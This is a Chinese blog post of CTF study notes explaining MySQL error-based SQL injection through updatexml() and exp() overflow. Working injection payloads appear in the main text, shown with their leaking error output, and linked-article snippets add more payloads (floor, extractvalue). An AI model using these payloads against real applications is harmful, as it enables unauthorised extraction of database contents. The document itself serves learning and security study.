exp报错注入和updatexml报错注入

最新推荐文章于 2024-06-21 16:22:09 发布
最新推荐文章于 2024-06-21 16:22:09 发布
阅读量582 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingchenldl/article/details/84576432
版权

前言

做了实验吧一个题,由于过滤比较多,学了两种新接触的报错注入。一下为总结,以便复习,查看,也作为萌新间的分享交流吧。

学习笔记 UpdateXml() MYSQL显错注入

在学习之前,需要先了解 UpdateXml() 。

UPDATEXML (XML_document, XPath_string, new_value);

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc

第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。

第三个参数:new_value,String格式,替换查找到的符合条件的数据

作用:改变文档中符合条件的节点的值

然后咱们再看看语句:

http://www.XXXIII.com/a.php?id=1 and updatexml(1,concat(0x7c,(select database()),0x7c),1)

带入sql语句,大概就是类似这样:

mysql> select * from users where id=1 and updatexml(1,concat(0x7c,(select database()),0x7c),1);
ERROR 1105 (HY000): XPATH syntax error: '|security|'

CONCAT(str1,str2,…)

返回结果为连接参数产生的字符串。如有任何一个参数为NULL ,则返回值为 NULL。

通过查询@@version,返回版本。然后CONCAT将其字符串化。因为UPDATEXML第二个参数需要Xpath格式的字符串,所以不符合要求,然后报错。

错误大概会是:

ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

原文链接

https://www.cnblogs.com/MiWhite/p/6228491.html

exp溢出报错注入

exp是以e为底的指数函数,

mysql> select exp(1);
+-------------------+
| exp(1)            |
+-------------------+
| 2.718281828459045 |
+-------------------+
1 row in set (0.00 sec)

但是,由于数字太大是会产生溢出。这个函数会在参数大于709时溢出,报错。

mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

将0按位取反就会返回“18446744073709551615”,再加上函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到最大的无符号BIGINT值。

mysql> select ~0;
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec) 


mysql> select ~(select version());
+----------------------+
| ~(select version())  |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)

我们通过子查询与按位求反,造成一个DOUBLE overflow error,并借由此注出数据。

mysql> select exp(~(select * from(select database())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select `x`.`database()` from (select database() AS `database()`) `x`)))'

在脚本语言中,就会将错误中的一些表达式转化成相应的字符串,即像这样:

DOUBLE value is out of range in 'exp(~((select 'error_based_hpf' from dual)))'

从而实现了报错注入。

原文链接

http://drops.xmd5.com/static/drops/tips-8166.html

「已注销」
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql exp_(转载)使用exp进行SQL报错注入
weixin_35172689的博客
01-18 858
此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践0x01 前言概述好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据,你可以读一下作者之前发的博文:BIGINT Overflow Error based injections,drops上面也有对应翻译,具体见这里。当我们拿到MySQL里的函数时...
(转载)使用exp进行SQL报错注入
weixin_33890499的博客
05-19 276
此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践 from:https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/ 0x01 前言概述 好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出...
SQL注入之updatexml报错注入(函数解释)
m0_74608722的博客
06-05 476
第二个参数 xml路径 是可操作的地方,xml文档中路径是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。原因:是因为updatexml(1,database(),1)这种书写的语法格式是正确的,所以不会爆出语法错误,在SQL注入中无法得到想要的库、表、列名(为了得到他们,应该怎样书写呐?正常查询 第二个参数的格式为 /xxx/xx/xx/xx ,即使查询不到也不会报错。
MYSQL 通过exp()报错注入
Ciyaso的博客
01-16 3770
代码解释 exp()数学函数,用于计算e的x次方的函数。 约束条件 5.5<mysql版本<5.6 原理 exp是以e为底的指数函数, 但是,由于数字太大是会产生溢出。这个函数会在参数大于709时溢出,报错。 将0按位取反就会返回“18446744073709551615”,再加上函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到最大的无符号BIGINT值。 我们通过子查询与按位求反,造成一个DOUBLE overflow error,并借由此注出数据。 从而实现了报错注入
mysql exp注入_Mysql注入之exp报错注入
weixin_39630466的博客
01-21 425
Author:SilentDATE:2017-11-17Warning:实操部分需实现效果,不然就是失败的实验;前言:好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据,当我们拿到MySQL里的函数时,作者比较感兴趣的是其中的数学函数,它们也应该包含一些数据类型来保存数值。所以作者就跑去测试看哪些函数会出现溢出错误。然后作者发现,当传递一个大于709...
实验吧——加了料的报错注入(exp报错注入)
weixin_30482383的博客
10-08 256
题目地址:http://ctf5.shiyanbar.com/web/baocuo/index.php 先查看页面源码得到提示知道了后台执行的sql语句,很常规的查询 测试了一个报错函数发现如下回显,可见屏蔽了报错信息,也有可能是监测到了updatexml这个报错函数,于是先用burp来fuzzing测试一波,看看哪些关键字 被屏蔽了 burp抓包并send to intru...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
floor()函数可以与group by和rand()函数联用来进行报错注入。报错原理:floor()函数与group by联用时,如果临时表中没有该主键,则在插入前会计算一次rand(),然后再由group by将计算出来的主键直接插入到临时表格中...
mysql exp
01-07
5.0的exp 自己下载看吧.
oracleClient安装包exp和imp文件.zip
01-27
综上所述,"oracleClient安装包exp和imp文件.zip"提供了一个完整的Oracle客户端环境,结合EXP和IMP工具,用户可以高效地管理和迁移数据库数据,这对于数据库管理员和开发者来说是非常有价值的资源。
Oracle EXP和IMP用法和介绍
09-11
Oracle EXP和IMP是Oracle数据库系统提供的两个实用工具,主要用于数据的导出和导入。这两个工具在数据迁移、备份恢复、数据库或表空间间的数据传输等方面发挥着重要作用。 1. Oracle EXPExport): Oracle ...
简单介绍和exp利用过程
07-04
简单介绍和exp利用过程提权篇之简单介绍和exp利用过程提权篇之简单介绍和exp利用过程提权篇之简单介绍和exp利用过程提权篇之简单介绍和exp利用过程提权篇之简单介绍和exp利用过程提权篇之简单介绍和exp利用过程提权...
【漏洞挖掘】——109、EXP报错注入深入刨析
最新发布
Fly_鹏程万里
06-21 55
函数用法:exp(x)函数功能:返回e的x次方。
SQL注入-报错注入
qwzf
09-25 3116
前言 之前没有对SQL报错注入详细总结过,总结一下。 12种SQL报错注入 1、通过floor报错,注入语句如下: and select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2、通过extractvalue报错,注入语句如下: ...
加了料的报错注入 - exp报错解法
苟有恒,必有三更眠,五更起。
07-03 310
加了料的报错注入 - exp报错解法 原题链接 http://ctf5.shiyanbar.com/web/baocuo/index.php 分析 exp测试一下(因为#之类的注释符被过滤,注意闭合): username=&amp;password='or exp() or ' 查数据库: username=&amp;password=' or exp...
编写sql注入最基础的exp
CC210231的博客
04-03 1511
下面直接上代码: 使用html编写: <!DOCTYPE html> <html > <head> <meta charset="UTF-8"> <title></title> </head> <body> <!-method根据实际情况选择,action属性中为提交的地址,name属性中为参数名,
延时注入exp编写
yyj1781572的博客
11-02 264
延时注入也是盲注入的一种,是利用sql语句达到延时的目的,在mysql中用的sleep()函数,select sleep(3)数据库延时3秒返回信息。利用这个函数加上if函数进行判断,就可以达到延时注入,注入得出数据。
简单的延时注入EXP
2301_77915293的博客
07-26 66
如果timeout函数返回的响应包含"timeout"字符串,说明请求超时,即数据库名称的第i个字符的ASCII值等于当前遍历的字符的ASCII值,将该字符添加到db_name中,并打印结果。在内层循环中,构造了一个payload参数,通过注入SQL语句来判断数据库名称的每个字符的ASCII值是否等于当前遍历的字符的ASCII值。如果timeout函数返回的响应包含"timeout"字符串,说明请求超时,即数据库名称的长度等于当前循环变量i,将db_len赋值为i,并打印结果。函数的参数是一个URL。
【SQL注入-可回显】报错注入:简介、相关函数、利用方法
05-29 1793
【SQL注入-可回显】
sql注入分类及报错注入EXP
weixin_45626840的博客
01-20 476
sql注入分类原理,报错注入原理,EXP编写
sql注入教程:报错注入与二阶攻击策略
首先,报错注入的核心在于两个前提条件:一是Web应用允许错误信息直接回显到页面上,比如通过extractvalue(), updatexml(), floor(), exp()等函数处理SQL错误;二是这些函数没有被妥善过滤,使得攻击者能利用它们来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值